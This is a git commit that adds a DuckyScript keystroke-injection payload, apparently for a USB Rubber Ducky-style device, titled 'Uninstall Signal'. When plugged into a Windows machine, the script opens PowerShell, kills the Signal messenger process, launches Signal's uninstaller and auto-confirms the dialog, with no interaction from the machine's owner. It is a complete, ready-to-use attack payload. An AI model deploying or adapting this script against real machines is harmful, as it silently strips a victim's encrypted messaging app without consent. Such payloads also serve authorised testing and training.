Uninstall Signal

pull/170/head
Aleff 2023-06-12 14:29:08 +02:00 committed by GitHub
parent 716a6bd80b
commit d097122051
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
REM #####################################
REM # |
REM # Title : Uninstall Signal |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################
REM Plug-And-Play <3
REM Requirements:
REM - Signal App installed
REM - ExecutionPolicy Bypass
DELAY 2000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN Stop-Process -Name "Signal"
DELAY 500
STRINGLN Start-Process "$env:LocalAppData\Programs\signal-desktop\Uninstall Signal.exe"
DELAY 1000
REM Popup "Are you sure?"
ENTER
ALT F4